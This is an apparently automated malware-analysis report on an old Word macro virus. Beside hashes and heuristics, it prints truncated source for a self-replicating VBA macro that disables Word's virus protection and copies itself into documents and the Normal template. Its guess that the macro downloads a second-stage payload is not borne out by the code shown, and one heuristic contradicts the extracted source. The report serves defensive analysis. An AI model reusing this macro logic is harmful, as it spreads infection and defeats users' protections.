Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f1c46e52db66d53f…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 36.5 KB
Created: 2002-12-10 05:11:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 9b7ed81ca4805c49cf2afebfb511d4a2
SHA-1: f6a3ace88ba5bd79084ca1bcc10cdd801343e8e3
SHA-256: f1c46e52db66d53f6fb93fa8c7f7daf274d4526c819cdee83258683405707a1a
Risk score: 180

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is a legacy Word document containing a VBA macro that triggers on the AutoOpen and Auto_Close events. The macro declares functions from the Windows GDI and User32 libraries, which suggests an attempt to execute arbitrary code; ClamAV's detection of the file as 'Doc.Trojan.CrazyMan-1' further supports this. The macro's intent is likely to download and execute a second-stage payload.

Heuristics (5)

  • ClamAV: Doc.Trojan.CrazyMan-1 (severity: critical; id: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.CrazyMan-1
  • VBA macros detected (severity: medium; 2 related findings; id: OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro (severity: high; id: OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Auto_Close macro (severity: high; id: OLE_VBA_AUTOCLOSE)
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker (severity: medium; id: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface; by itself it is not an attribution to a downloader or to a parser CVE.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4523 bytes
SHA-256: 0be9aa8bec6f6d8b4f3c04bb15b2385b98fbe9199405f7c5124be3c8cb66ff9c
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1TemplateProject.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "LoveIris"
Dim MainWindow As Long
Dim MainWindowDC As Long
Dim Pen As Long
Dim Brush As Long
Dim WindowsDir As String * 50
Dim ExitCommand As String
Type LOGFONT
        lfHeight As Long
        lfWidth As Long
        lfEscapement As Long
        lfOrientation As Long
        lfWeight As Long
        lfItalic As Byte
        lfUnderline As Byte
        lfStrikeOut As Byte
        lfCharSet As Byte
        lfOutPrecision As Byte
        lfClipPrecision As Byte
        lfQuality As Byte
        lfPitchAndFamily As Byte
        lfFaceName(50) As Byte
End Type
Dim MyFont As LOGFONT
Declare Function CreateFontIndirect Lib "gdi32" Alias "CreateFontIndirectA" (lpLogFont As LOGFONT) As Long
Declare Function SetTextColor Lib "gdi32" (ByVal hdc As Long, ByVal crColor As Long) As Long
Declare Function SetBkColor Lib "gdi32" (ByVal hdc As Long, ByVal crColor As Long) As Long
Declare Function GetActiveWindow Lib "user32" () As Long
Declare Function GetWindowDC Lib "user32" (ByVal hwnd As Long) As Long
Declare Function Rectangle Lib "gdi32" (ByVal hdc As Long, ByVal X1 As Long, ByVal Y1 As Long, ByVal X2 As Long, ByVal Y2 As Long) As Long
Declare Function TextOut Lib "gdi32" Alias "TextOutA" (ByVal hdc As Long, ByVal x As Long, ByVal y As Long, ByVal lpString As String, ByVal nCount As Long) As Long
Declare Function CreatePen Lib "gdi32" (ByVal nPenStyle As Long, ByVal nWidth As Long, ByVal crColor As Long) As Long
Declare Function CreateSolidBrush Lib "gdi32" (ByVal crColor As Long) As Long
Declare Function SelectObject Lib "gdi32" (ByVal hdc As Long, ByVal hObject As Long) As Long
Declare Function DeleteObject Lib "gdi32" (ByVal hObject As Long) As Long
Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Sub AutoOpen()
OutBreak
End Sub
Sub AutoClose()
OutBreak
End Sub
Sub AutoNew()
OutBreak
End Sub
Function InDocument() As Boolean
Dim item
InDocument = False
For Each item In ActiveDocument.VBProject.VBComponents
If item.Name = "LoveIris" Then InDocument = True
Next
End Function
Function InTemplate() As Boolean
Dim item
InTemplate = False
For Each item In NormalTemplate.VBProject.VBComponents
If item.Name = "LoveIris" Then InTemplate = True
Next
End Function
Sub DrawFont()
With MyFont
.lfHeight = 24
.lfWidth = 10
.lfEscapement = 0
.lfOrientation = 0
.lfWeight = 600
.lfItalic = 0
.lfUnderline = 0
.lfStrikeOut = 0
.lfCharSet = 1
.lfOutPrecision = 0
.lfClipPrecision = 0
.lfQuality = 0
.lfPitchAndFamily = 0
.lfFaceName(0) = &HCB
.lfFaceName(1) = &HCE
.lfFaceName(2) = &HCC
.lfFaceName(3) = &HE5
.lfFaceName(4) = 0
End With
MainWindow = GetActiveWindow()
MainWindowDC = GetWindowDC(MainWindow)
Brush = CreateSolidBrush(RGB(80, 80, 255))
Pen = CreatePen(0, 4, RGB(220, 80, 180))
SelectObject MainWindowDC, Pen
SelectObject MainWindowDC, Brush
Rectangle MainWindowDC, 100, 200, 440, 300
SelectObject MainWindowDC, CreateFontIndirect(MyFont)
SetTextColor MainWindowDC, RGB(0, 255, 0)
SetBkColor MainWindowDC, RGB(80, 80, 255)
SetTextColor MainWindowDC, RGB(255, 255, 0)
TextOut MainWindowDC, 120, 220, "Iris,算算我们相识多少天了?", 28
TextOut MainWindowDC, 300, 250, "永远爱你的W.L.", 14
End Sub
Sub GoInIt()
ActiveDocument.VBProject.VBComponents.Import ("c:\windows\w&i.386")
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End Sub
Sub OutBreak()
On Error Resume Next
Options.VirusProtection = False
Options.SaveNormalPrompt = False
If Not InDocument() Then
GoInIt
End If
With Application.FileSearch
.NewSearch
.LookIn = "C:\windows\"
.SearchSubFolders = False
.FileName = "w&i.386"
.MatchTextExactly = False
.FileType = msoFileTypeAllFiles
If .Execute <= 0 Then
ActiveDocument.VBProject.VBComponents("L
... (truncated)
ole10native_00.bin | ole-package | OLE Ole10Native stream: ObjectPool/_1035146424/Ole10Native | 876 bytes
SHA-256: 871d87039e91162a0c91f040f6352e358eda568ef851b777cc79d04787cfcc2f